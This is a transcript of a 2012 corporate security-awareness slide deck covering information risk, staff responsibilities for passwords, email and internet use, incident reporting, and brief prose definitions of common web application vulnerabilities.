Presentation is loading. Please wait.

Presentation is loading. Please wait.

General Security Guidelines Best Practices for Everyone Presented at: Nextbridge LHR C1 June 1, 2012.

Published byCameron Kennedy Modified over 9 years ago

Similar presentations

Presentation on theme: "General Security Guidelines Best Practices for Everyone Presented at: Nextbridge LHR C1 June 1, 2012."— Presentation transcript:

1 General Security Guidelines Best Practices for Everyone Presented at: Nextbridge LHR C1 June 1, 2012

2 Topics we will cover in this presentation What is Information What is Information Security What is Risk Corporate Security How we are linked with Corporate Security User Responsibilities Web Application Vulnerabilities (Case Study) Questions

3 WHO IS AT THE CENTRE OF SECURITY U - R 3

4 What is Information? Information is an asset which, like other important business assets, has value to an organization and consequently needs to be suitably protected

5 Information can be CreatedStoredDestroyed ProcessedTransmittedUsed/Misused CorruptedLostStolen

6 Information can be… Printed or written on paper Stored electronically Transmitted by post or using electronics means Shown on corporate videos Displayed / published on web Verbal – spoken in conversations

7 What is Information Security? ?

8  The quality or state of being secure to be free from danger  Security is recognized as essential to protect vital processes and the systems that provide those processes  Security is not something you buy, it is something you do

9 Business survival depends upon Information Security What information Security does Protects information from a range of threats Ensures business continuity Minimizes financial loss Optimizes return on investments Increases business opportunities

10 What is Risk? A possibility that a threat exploits a vulnerability in an asset and causes damage or loss to the asset Risk Something that can potentially cause damage to the organization, IT Systems or network Threat A weakness in the organization, IT Systems, or network that can be exploited by a threat Vulnerability

11 High User Knowledge of IT Systems Theft, Sabotage, Misuse Virus Attacks Systems & Network Failure Lack Of Documentation Lapse in Physical Security Doing without Knowing

12 Sources…! Sources Source External Hackers Internal Hackers Terrorist Poorly trained employees Motivation Challenge Ego Game Playing Deadline Financial problems Disenchantment Revenge Political Unintentional errors Programming errors Data entry errors Threat System hacking Social engineering Dumpster diving Backdoors Fraud Poor documentation System attacks Social engineering Letter bombs Viruses Denial of service Corruption of data Malicious code introduction System bugs unauthorized access

13 Corporate Security

14 Corporate Security is responsibility of everyone Corporate Security PolicyPeople Risk Management LegalizationComplianceTechnology

15 User Responsibilities 15 Good Practices Follow Security Procedures Wear Identity Cards and Badges Ask unauthorized visitor his credentials Attend visitors in Reception and Conference Room only Avoid these Bring visitors in operations area without prior permission Bring hazardous and combustible material in secure area Practice “Piggybacking” Bring and use pen drives, zip drives, iPods, other storage devices unless and otherwise authorized to do so.

16 16 Good Practices Always use at least 8 character password with combination of alphabets, numbers and special characters (*, %, @, #, $, ^) Use passwords that can be easily remembered by you Change password regularly Use password that is significantly different from earlier passwords Avoid these Use passwords which reveals your personal information or words found in dictionary Write down or Store passwords Share passwords over phone or Email Use passwords which do not match above complexity criteria User Responsibilities

17 17 Good Practices Use internet services for business purposes only Avoid these Do not access internet through dial-up connectivity Do not use internet for viewing, storing or transmitting obscene or pornographic material Do not use internet for accessing auction sites Do not use internet for hacking other computer systems Do not use internet to download / upload commercial software / copyrighted material

18 18 Good Practices Use official mail for business purposes only Follow the mail storage guidelines to avoid blocking of E-mails If you come across any junk / spam mail, do the following Remove the mail. Inform the security help desk Inform the same to server administrator Inform the sender that such mails are undesired Avoid these Do not use official ID for any personal subscription purpose Do not send unsolicited mails of any type like chain letters or E-mail Hoax Do not send mails to client unless you are authorized to do so Do not post non-business related information to large number of users Do not open the mail or attachment which is suspected to be virus or received from an unidentified sender

19 Report Security Incidents (IT and Non-IT) to Helpdesk through E-mail to mis@nxb.com.pk Telephone : Ext#611 Reporting through helpdesk system @ http://mis.vteamslabs.com e.g.: IT Incidents: Mail Spamming, Virus attack, Hacking, etc. Non-IT Incidents: Unsupervised visitor movement, Information leakage, Bringing unauthorized Media Do not discuss security incidents with any one outside organization Do not attempt to interfere with, obstruct or prevent anyone from reporting incidents 19

20 Human Wall is better than Firewall Lets build a human wall around our firewall

21 21 Best Practices Ensure your Desktops are having latest antivirus updates Ensure your system is locked when you are away Always store laptops/ media in a lockable place Be alert while working on laptops during travel Download data from known and trusted websites Do not use inline attachment reading in your email clients Do not click any URL not known to you Ensure sensitive business information is under lock and key when unattended Ensure back-up of sensitive and critical information assets Verify credentials, if the message is received from unknown sender Always switch off your computer before leaving for the day Keep your self updated on information security aspects

22 Do not let this Happen

23 Web Application Vulnerabilities No language can prevent insecure code, although there are language features which could aid or hinder a security-conscious developer

24 Five Evil Sisters Remote code execution SQL injection Format string vulnerabiliti es Cross Site Scripting (XSS) Username enumeration

25 Web Application Vulnerabilities Remote Code Execution This vulnerability allows an attacker to run arbitrary, system level code on the vulnerable server and retrieve any desired information contained therein. Improper coding errors lead to this vulnerability. At times, it is difficult to discover this vulnerability during penetration testing assignments but such problems are often revealed while doing a source code review. However, when testing Web applications it is important to remember that exploitation of this vulnerability can lead to total system compromise with the same rights as the Web server itself. Rating: Highly Critical

26 SQL Injection SQL injection is a very old approach but it's still popular among attackers. This technique allows an attacker to retrieve crucial information from a Web server's database. Depending on the application's security measures, the impact of this attack can vary from basic information disclosure to remote code execution and total system compromise Rating: Highly Critical

27 Format String Vulnerability This vulnerability results from the use of unfiltered user input as the format string parameter in certain Perl or C functions that perform formatting, such as C's printf(). A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. Format string vulnerability attacks fall into three general categories: denial of service, reading and writing. Rating: Highly Critical

28 Cross Site Scripting The success of this attack requires the victim to execute a malicious URL which is crafted in such a manner to appear to be legitimate at first look When visiting such a crafted URL, an attacker can effectively execute something malicious in the victim's browser. Some malicious JavaScript, for example, will be run in the context of the web site which possesses the XSS bug Rating: Highly Critical

29 Username Enumeration Username enumeration is a type of attack where the backend validation script tells the attacker if the supplied username is correct or not. Exploiting this vulnerability helps the attacker to experiment with different usernames and determine valid ones with the help of different error messages Rating: Critical

30 Case Study In this slide, we will cover the following about the subject What is it about? Background of the happening Refer to PDF Reports Conclusions

31 Now its your turn to speak

32 GENERAL SECURITY GUIDELINES Best Practices for Everyone Designed & Presented by: Abdul Rehman Senior System Administrator Presented at: Nextbridge LHR C1 May 17, 2012

Download ppt "General Security Guidelines Best Practices for Everyone Presented at: Nextbridge LHR C1 June 1, 2012."

Similar presentations

Unit 1 Living in the Digital WorldChapter 1 Lets Communicate Internet Safety.

Unit 1 Living in the Digital WorldChapter 1 Lets Communicate Internet Safety.
UNIT 20 The ex-hacker.

UNIT 20 The ex-hacker.
Thank you to IT Training at Indiana University Computer Malware.

Thank you to IT Training at Indiana University Computer Malware.
Online Safety. Introduction The Internet is a very public place Need to be cautious Minimize your personal risk while online Exposure to: viruses, worms,

Online Safety. Introduction The Internet is a very public place Need to be cautious Minimize your personal risk while online Exposure to: viruses, worms,
COMPUTER BASICS METC 106. The Internet Global group of interconnected networks Originated in 1969 – Department of Defense ARPANet Only text, no graphics.

COMPUTER BASICS METC 106. The Internet Global group of interconnected networks Originated in 1969 – Department of Defense ARPANet Only text, no graphics.
1 Electronic Information Security – What Researchers Need to Know University of California Office of the President Office of Research May 2005.

1 Electronic Information Security – What Researchers Need to Know University of California Office of the President Office of Research May 2005.
Computer viruses Hardware theft Software Theft Unauthorized access by hackers Information Theft Computer Crimes.

Computer viruses Hardware theft Software Theft Unauthorized access by hackers Information Theft Computer Crimes.
1 MIS 2000 Class 22 System Security Update: Winter 2015.

1 MIS 2000 Class 22 System Security Update: Winter 2015.
Copyright © 2006 by The McGraw-Hill Companies, Inc. All rights reserved. McGraw-Hill Technology Education Copyright © 2006 by The McGraw-Hill Companies,

Copyright © 2006 by The McGraw-Hill Companies, Inc. All rights reserved. McGraw-Hill Technology Education Copyright © 2006 by The McGraw-Hill Companies,
Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.

Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.
Prepared by: Nahed Al-Salah

Prepared by: Nahed Al-Salah
Computer Viruses.

Computer Viruses.
1 UNIT 20 The ex-hacker Lecturer: Ghadah Aldehim.

1 UNIT 20 The ex-hacker Lecturer: Ghadah Aldehim.
IDENTITY THEFT ARE YOU SAFE?. HOW DOES THIS HAPPEN TO ME? Internet “Security “ When using a public computer, never access any vital accounts like banking.

IDENTITY THEFT ARE YOU SAFE?. HOW DOES THIS HAPPEN TO ME? Internet “Security “ When using a public computer, never access any vital accounts like banking.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
1 Enterprise Security Your Information Security and Privacy Responsibilities © 2008 Providence Health & Services This information may be replicated for.

1 Enterprise Security Your Information Security and Privacy Responsibilities © 2008 Providence Health & Services This information may be replicated for.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Presented by Manager, MIS.  GRIDCo’s intentions for publishing an Acceptable Use Policy are not to impose restrictions that are contrary to GRIDCo’s.

Presented by Manager, MIS.  GRIDCo’s intentions for publishing an Acceptable Use Policy are not to impose restrictions that are contrary to GRIDCo’s.
Quiz Review.

Quiz Review.

Similar presentations

Ads by Google